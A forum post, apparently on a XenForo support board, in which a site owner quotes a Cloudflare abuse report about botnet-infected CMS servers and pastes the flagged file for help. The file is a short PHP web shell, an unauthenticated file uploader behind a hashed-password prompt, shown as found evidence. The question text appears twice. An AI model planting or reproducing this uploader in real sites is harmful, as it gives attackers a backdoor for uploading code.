Hello,
I just recived email from cloudflare with this content
And content of defaul.php file is this
Now I have few questions:
1) Is this file real xenforo file or is it created from that ****in* bot?
2) If this is real xenforo file is there anything suspicious in it?
Do you have any sugestions what to do if file is OK, how to find that junk and why cloudflare reported that file?
P.S.
I masked my address because I am not sure how those bots works and could they use my link for new attacks, but if necessary i can provide real link to admins.
I just recived email from cloudflare with this content
CloudFlare received a malware report regarding:
*************.net
Below is the report we received:
Reporter's Name: abuse@cloudflare.com
Reporter's Email Address: abuse@cloudflare.com
Reported URLs:
http://forum.************.net/cgi-bin/defalt.php
Logs or Evidence of Abuse: (U) Since September 2012, approximately 50 U.S. financial
institutions have been targeted in over 350 separate DDoS attacks with
varying effects. The botnets used in the attacks, identified as
“Brobot” and “Kamikaze/Toxin” consist of compromised high bandwidth
webservers with vulnerable content management systems (CMS). The
compromised bots are infected through a vulnerable CMS account. Once
the account is accessed, attack scripts are uploaded to a hidden
directory on the associated web site.
(U) The Kamikaze scripts embedded themselves in legitimate PHP files
instead of just putting new, standalone malicious scripts on the
hosts. One typical file that was infected with this method is
COPYRIGHT.php. The affected customers should check all of the PHP
files on their sites to look for malicious code that has been inserted
into script files or that's contained in other standalone files that
may be dispersed throughout directories on the system.
We have provided the name of your hosting provider to the reporter. Additionally, we have forwarded this complaint to your hosting provider. We have also restricted access to the malware-related content until it has been removed.
Regards,
CloudFlare Abuse
And content of defaul.php file is this
<?php $psf="8386b4523f5af044f90b79b972194c69";
if (isset($_FILES['filefor']) and !$_FILES['filefor']['error'] ){
@move_uploaded_file($_FILES['filefor']['tmp_name'], $_FILES['filefor']['name']) ;echo ' G00d ';
}
if(md5(md5($_REQUEST['method']))!=$psf){
echo ' You don\'t have permission to access . ';exit();
}
echo '<form method=post enctype=multipart/form-data><input type=file name=filefor ><input type=submit /></form>';
Now I have few questions:
1) Is this file real xenforo file or is it created from that ****in* bot?
2) If this is real xenforo file is there anything suspicious in it?
Do you have any sugestions what to do if file is OK, how to find that junk and why cloudflare reported that file?
P.S.
I masked my address because I am not sure how those bots works and could they use my link for new attacks, but if necessary i can provide real link to admins.